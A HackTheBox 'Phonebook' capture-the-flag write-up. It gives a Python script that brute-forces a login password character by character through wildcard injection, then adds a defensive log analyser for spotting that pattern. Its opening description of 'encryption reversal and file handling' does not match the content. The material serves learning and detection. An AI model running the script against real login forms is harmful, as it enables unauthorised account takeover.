
HackTheBox Phonebook Writeup

Explore the basics of cybersecurity in the Phonebook Challenge on Hack The Box. This easy-level Challenge introduces encryption reversal and file handling concepts in a clear and accessible way, perfect for beginners.

import requests
import sys

if len(sys.argv) < 2:
    print("Usage: python script.py <url>")
    sys.exit(1)

username = "reese"
login_url = f"http://{sys.argv[1]}/login"
# Candidate characters tried for each password position. The "*" appended
# to every guess below acts as a wildcard on the server side, so a correct
# prefix is accepted before the whole password is known.
characters = "qwertyuiopQWERTYUIOPasdfghjklASDFGHJKLzxcvbnmZXCVBNM_-[]}{1234567890"

def create_session():
    # One session keeps cookies across the whole run.
    return requests.Session()

def try_login(user, pw, session):
    # The guess is sent both as the form password and in X-Forwarded-For;
    # Referer is set to the login page so the request looks like a form post.
    headers = {
        'X-Forwarded-For': pw,
        'Referer': login_url
    }
    data = {
        "username": user,
        "password": pw
    }
    # allow_redirects=False so the Location header of the first response is visible.
    response = session.post(login_url, headers=headers, data=data, allow_redirects=False)
    # A failed login redirects back to /login; any other response counts as a hit.
    return 'location' not in response.headers or '/login' not in response.headers.get('location', '')

def force_one(prefix, session):
    # Return the first character that, appended to prefix, still logs in.
    for x in characters:
        if try_login(username, prefix + x + "*", session):
            return x
    return ''

def forcer():
    got = ""
    session = create_session()
    while True:
        next_char = force_one(got, session)
        if not next_char:
            # No character extends the prefix: the full password has been recovered.
            break
        got += next_char
        print(got)

forcer()

Summary

Phonebook is an easy-level challenge on Hack The Box that exploits a web application’s login functionality using username enumeration and blind password brute-forcing. The script automates guessing the password for the reese user by submitting each guess as the form password (and in the X-Forwarded-For header), sending the login URL as the Referer, and treating any response that does not redirect back to /login as a hit.

By iterating through a set of possible characters, appending a trailing wildcard to each candidate prefix, and keeping the characters the server accepts, the script reconstructs the password character by character. This challenge demonstrates the risk of an authentication check that accepts wildcard input and answers differently for a partial match, and highlights the need for login implementations that compare the full credential and fail uniformly.
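A defender-side check for the pattern described above, added here as an example and not part of the original writeup. It assumes a reverse proxy that logs each POST /login with the peer address and the raw X-Forwarded-For header (the sample lines are constructed), flags header values that are not IP addresses, since the script places its password guesses there, and flags bursts of login posts from one peer for one user.

```python
import ipaddress
import re
from collections import defaultdict
from datetime import datetime
# Constructed sample lines (not from the challenge): a reverse proxy logging
# POST /login with peer address, raw X-Forwarded-For, username and outcome.
SAMPLE_LOG = """\
2024-01-01T10:00:00Z peer=10.0.0.5 xff="q*" user=reese result=fail
2024-01-01T10:00:01Z peer=10.0.0.5 xff="r*" user=reese result=ok
2024-01-01T10:00:02Z peer=10.0.0.5 xff="rq*" user=reese result=fail
2024-01-01T10:00:02Z peer=10.0.0.5 xff="re*" user=reese result=ok
2024-01-01T10:05:00Z peer=198.51.100.7 xff="203.0.113.9" user=alice result=ok
"""
LINE_RE = re.compile(r'^(?P<ts>\S+) peer=(?P<peer>\S+) xff="(?P<xff>[^"]*)" '
                     r'user=(?P<user>\S+) result=(?P<result>\w+)$')

def parse_log(text):
    """Parse matching lines into dicts; the timestamp becomes a datetime."""
    events = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        ev = m.groupdict()
        ev["ts"] = datetime.strptime(ev["ts"], "%Y-%m-%dT%H:%M:%SZ")
        events.append(ev)
    return events

def malformed_forwarded_for(events):
    """X-Forwarded-For values that are not IP addresses (the guesses end up here)."""
    bad = set()
    for ev in events:
        try:
            ipaddress.ip_address(ev["xff"].strip())
        except ValueError:
            bad.add(ev["xff"])
    return sorted(bad)

def login_bursts(events, window_seconds=60, threshold=4):
    """(peer, user) pairs with >= threshold login posts inside one sliding window."""
    by_key = defaultdict(list)
    for ev in events:
        by_key[(ev["peer"], ev["user"])].append(ev["ts"])
    hits = {}
    for key, stamps in by_key.items():
        stamps.sort()
        start = 0
        for end, t in enumerate(stamps):
            while (t - stamps[start]).total_seconds() > window_seconds:
                start += 1
            if end - start + 1 >= threshold:
                hits[key] = max(end - start + 1, hits.get(key, 0))
    return hits
```

A real run needs dozens of posts per recovered character, so a threshold far below that still catches the pattern while leaving ordinary logins alone.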

This post is licensed under CC BY 4.0 by the author.